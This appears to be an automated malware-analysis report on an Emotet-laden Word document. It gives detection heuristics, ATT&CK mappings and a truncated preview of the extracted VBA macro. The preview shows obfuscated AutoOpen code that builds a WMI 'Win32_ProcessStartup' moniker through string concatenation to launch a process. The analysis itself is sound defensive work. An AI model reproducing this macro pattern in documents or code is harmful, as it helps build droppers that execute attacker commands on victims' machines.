MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains legacy WordBasic auto-exec markers and VBA macros, specifically an AutoOpen macro. Critical heuristics indicate the use of GetObject and WMI to launch a process, a common technique for Emotet. The ClamAV signature also explicitly identifies it as Emotet.
Heuristics 7
-
ClamAV: Doc.Malware.Emotet-6960319-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emotet-6960319-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27709 bytes |
SHA-256: e0c2b71cf4b4086de0fd35eb8aab44f5184edbf4997afb361dcb23f6510110ec |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "i_7_49"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "W452789"
Attribute VB_Base = "0{26B1CED9-294D-4291-96ED-B3DA0540AACB}{1BEB1573-C98A-42BD-9D5A-463FD125D331}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "w5417665"
Attribute VB_Name = "P71257"
Attribute VB_Base = "0{7CF31FA9-AE4B-427D-B00C-EBD14E5E8970}{60A09B9E-71C1-4118-9058-BC529E75E6FB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "w_8365_6"
Function k45__2(V4_600)
Select Case N37503
Case o98_12 = F5_979 = Sgn(915663398)
Case R46_782 = U8499112
Case Y613_6 = Log(s3964_17)
Case J31742 = CBool(770043342)
Case O8095892 = 948052885
Case Z64_45 = CDate(Q49329_9)
End Select
Select Case i3872843
Case v7__1366 = K865519 = Sgn(219551326)
Case n035125 = i5451_5
Case K85848 = Log(l3210249)
Case S7_001 = CBool(993609842)
Case u456_2 = 541530122
Case I16601 = CDate(S584_7)
End Select
Set k45__2 = CVar(V4_600)
Select Case O68469
Case j4_18073 = z961953_ = Sgn(260716006)
Case f642160 = W24996
Case S449731 = Log(N931660)
Case m80858 = CBool(34746207)
Case t694450 = 596061870
Case w133453 = CDate(z0756884)
End Select
Select Case D6917810
Case P00_173 = w4660_1 = Sgn(182749233)
Case r31422 = A79538
Case l30051__ = Log(i_01765)
Case N379985 = CBool(173061214)
Case Z2950394 = 759976378
Case O2_6754_ = CDate(B73092)
End Select
End Function
Sub autoopen()
Select Case s_8_45_3
Case f6028821 = T78_36 = Sgn(89678378)
Case b67158_4 = o1776794
Case s97216 = Log(l904537)
Case V5595338 = CBool(147661988)
Case H4530329 = 941363160
Case v5771_ = CDate(R_27500)
End Select
Select Case B46719
Case B902772 = c1031__2 = Sgn(583902484)
Case i13034 = T23150_
Case N650_80 = Log(p_4766_7)
Case b_03_669 = CBool(361303888)
Case W296015 = 171051730
Case U266930 = CDate(E9018653)
End Select
Select Case T145343
Case R655895 = p086_2 = Sgn(21578397)
Case I7101639 = p_0264_6
Case W1992260 = Log(J41512)
Case Y030385 = CBool(302452967)
Case L2_70552 = 810010039
Case v15_675_ = CDate(S16138)
End Select
Call F7_2116
Select Case p90899
Case I28781_ = P848_25 = Sgn(379163554)
Case b6364785 = m44227
Case B877458 = Log(V07546)
Case A_85__ = CBool(546830911)
Case f_4274 = 339284241
Case h4_2005 = CDate(i28506)
End Select
Select Case t_6993
Case q4392_ = w8_2274 = Sgn(35180138)
Case f55071 = z64247_
Case N64_187 = Log(O_03856)
Case q8_92_7 = CBool(4062587)
Case r45253 = 17643203
Case F7898_9_ = CDate(r078_215)
End Select
Select Case z73643
Case G38789 = n2_8048 = Sgn(882778830)
Case E030459_ = M4948_2
Case a62_24 = Log(n38_45)
Case l03_49 = CBool(663889470)
Case G647__24 = 608058999
Case z01774 = CDate(J80023_1)
End Select
End Sub
Attribute VB_Name = "W136440"
Function F7_2116()
On Error Resume Next
Select Case F86813
Case B0587_35 = f63365_ = Sgn(280587394)
Case H320_130 = K513_37
Case H576021 = Log(J1997479)
Case k795156 = CBool(185070932)
Case N30796 = 418098894
Case M8014848 = CDate(m826_8_5)
End Select
Select Case P_557_
Case H343062 = F758_627 = Sgn(487222661)
Case z90_322 = T24537
Case I_5793 = Log(D44540)
Case D74541 = CBool(798423184)
Case I4_316 = 335236939
Case W7613608 = CDate(m7_71347)
End Select
Set M_375173 = k45__2(GetObject("wi" _
+ "nmg" + "mts:W" _
+ "in32_P" + "rocess" _
+ "Sta" + "rtup"))
Select Case M50341
Case U21241_8 = I25938 = Sgn(64998561)
Case z97864 = j30_438
Case q609925 = Log(a05332)
Case S2067906 = CBool(33
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.